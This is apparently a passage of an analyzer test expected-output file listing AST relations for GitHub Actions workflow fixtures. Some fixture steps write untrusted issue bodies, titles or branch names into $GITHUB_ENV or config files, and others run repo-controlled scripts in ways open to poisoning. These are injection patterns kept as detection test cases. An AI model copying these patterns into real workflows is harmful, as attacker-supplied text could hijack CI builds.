Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| 